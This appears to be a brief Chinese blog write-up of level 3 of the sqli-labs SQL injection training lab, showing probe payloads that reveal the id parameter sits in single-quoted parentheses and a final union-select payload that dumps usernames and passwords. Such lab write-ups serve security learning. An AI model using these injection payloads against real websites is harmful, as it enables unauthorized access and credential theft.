Sqli-labs 03

黎 浩然/ 2 12 月, 2021/ 安全/SECURITY/ 0 comments

当有括号时,如何判断 id 是在无引号、单引号还是双引号中?

  • payload 为 ?id=0
  • payload 为 ?id=1–+
  • Less 1 – Less 4 用这个payload都不会报错

  • payload 为 ?id=1′–+
  • payload 为 ?id=1″–+

    只有单引号报错了,再尝试

    • payload 为 ?id=1)–+
    • payload 为 ?id=1′)–+
    • payload 为 ?id=1″)–+

    因此推测参数 id 放在括有单引号的圆括号内

    payload

    ?id=0') union select 1,2,group_concat(username,0x3a,password) from users--+

    Share this Post

    Leave a Comment

    您的邮箱地址不会被公开。 必填项已用 * 标注

    *
    *